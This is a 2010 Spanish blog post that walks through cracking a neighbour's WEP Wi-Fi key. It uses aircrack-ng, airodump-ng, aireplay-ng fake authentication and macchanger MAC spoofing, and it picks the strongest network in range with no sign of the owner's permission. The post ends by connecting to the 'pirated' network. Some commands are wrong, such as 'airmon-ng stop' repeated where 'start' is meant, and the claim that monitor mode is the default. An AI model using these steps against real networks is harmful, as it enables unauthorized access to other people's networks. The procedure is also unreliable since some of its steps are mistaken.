google analitycs

jueves, 28 de enero de 2010

Auditar Redes

Hace poco tuve la oportunidad de volver a poner prueba mis conocimientos sobre redes y su vulneración, a pedido de un amigo, muestro en resumen los procedimientos de como vulnerar una red.

Específicaciones técnicas

Distro: Ubuntu 9.04
Laptop: Toshiba Satellite L355
Chipset: Atheros (Red inalambrica)

Instalaciones Necesarias
Bueno para empezar la cazeria de la red primero debemos poner a punto nuestra PC o laptop para que pueda realizar la auditoría de la red, hacemos las siguientes instalaciones (en consolo y como superusuario):

apt-get install aircrack-ng
apt-get install buil-essential
apt-get install madwifi-tools
apt-get install macchanger

Hecho esto, es necesario poner nuestra interfaz de red inalambrica en modo monitor dado que por defecto está en modo monitor, ¿ Cómo sé cuál es mi interfaz inalambrica?, entonces digitamos en la consola:

iwconfig


Veremos que mi interfaz es ath0 y también muestra que está en modo managed


Lo siguiente seria:

airmon-ng stop ath0

Te debe aparecer 3 columnas donde te describe tu interfaz, chipset y driver, seguimos en la linea de comandos y ponemos:

airmon-ng stop ath0

Volvemos a iwconfig y veremos que nuestra interfaz  cambio a modo monitor, en mi caso cambio a ath1 mode: Monitor

Luego debemos dar de baja a nuestra interfaz con la finalidad de cambiar la dirección MAC, en este caso una genérica como 00:11:22:33:44:55, para ello ponemos:

ifconfig ath1 down 
macchanger -m 00:11:22:33:44:55 ath1
ifconfig ath1 up

chekamos con iwconfig si nuestra dirección MAC ha cambiado

Muy bien hecho todos estos pasos lo siguiente es empezar con la auditoria de redes, existen varios tipos de seguridad, no he probado haer auditoria a todas estoy en ese proceso por eso publico mis avances:

Seguridad de clave WEP

En este tipo de seguridad existen dos casos, si bien es cierto que se puede obtener la clave el detalle esta en como se puede utilizar la clave, esto lo veremos al final

Otra vez en linea de comandos ponemos:

airodump-ng  (nombre de nuestra interfaz) en este caso ath1, quedando asi:

airodump-ng ath1

Con el cual nos aparecerá todo el listado de redes que detectamos, en dividido en las siguientes columnas:
  • BSSID: dirección de la red
  • PWR : potencia de la red
  • Beatcons:
  • Data: datos transferidos de la red
  • #/s
  • CH: canal de la red
  • MB: megabytes que transmite la red
  • ENC: encriptado de la red
  • CIPHER: cifrado de la red
  • AUTH: autentificación de la red
  • ESSID: nombre de la red
Para el caso de la red del tipo de seguridad WEP elegimos la de mayor potencia (es decir ya decidimos a quien auditar) puede ser  del tipo:

ENC:wep CIPHER:wep AUTH: OPN o vacia

ya seleccionada la red procedemos  a lo siguiente:

airodump-ng "interfaz" -w "nombre del archivo de capturas" -c "canal en que se encuentra la red a auditar", por ejemplo quiero auditar a la red ROSA y esta en el canal 6 y al archivo lo llamare korderoman

airodump-ng ath1 -w korderoman -c 6

Con lo cual empezarán las capturas específicamente de los que se encuentren en el canal 6. Ahora en la web se recomienda obtener como minimo 150000 datos, para acelerar dicho proceso se emplea el siguiente comando:

aireplay-ng -1 0 -e "nombre de la red" -a "BSSID de la red" -h "nuestra dirección MAC que es 00:11:.... se acuerdan que la cambiaron" ath1quedando como ejemplo algo asi:

aireplay-ng -1 0 -e ROSA -a  00:18:5B:AB:60:61 -h 00:11:22:33:44:55 ath1

Se dara una autentificación y empezará la aceleración de la descarga de datos.
Cuando ya se haya descargado el total de datos (150000) hacemos lo siguiente:

aircrack-ng korderoman*.cap

Te pedira que seleciones el número de la network y seleccionas la que tenga mas IVs, y procederá a desencriptar la clave por fuerza bruta, que quiere decir ello, que prueba todas las posibilidades de clave hasta obtener un resultado.

En este punto pueden ocurrir 3 cosas:

  • La clave se revela de manera hexadecimal y ASCII, se coloca la clave ASCII y listo nos conectamos.
  • La clave solo se revela en forma hexadecimal con lo cual podemos recurrir a un convertor y listo. Aquí hay uno.
  • La clave se revela como hexadecimal pero por mas que la convertimos sale en simbolos extraños y no nos permite acceder a al red.

El último caso es especial, pues que posiblemente no hallamos desencriptado una clave si no hallamos obtenido la llave de la red. Para ello debemos realizar el proceso con:

iwconfig

Iwconfig nombre_tu_dispositivo (ath0) essid nombre_red_pirateada key AA:AA:BC:CB:12:34:DD:98:76:EE:FF:20


Y listo , bueno este post lo seguire actualizando en cuanto a la seguridad WPA que ya es auditable.

1 comentario:

Anthony Mogrovejo dijo...

El titulo de tu post deberia ser "realizando tecnicas de vulnerabilidades WEP/WAP". El concepto de auditar una red va por otro lado.
No es simplemente romper el key es ir a indagar que mas hay en la red lan o wi fi.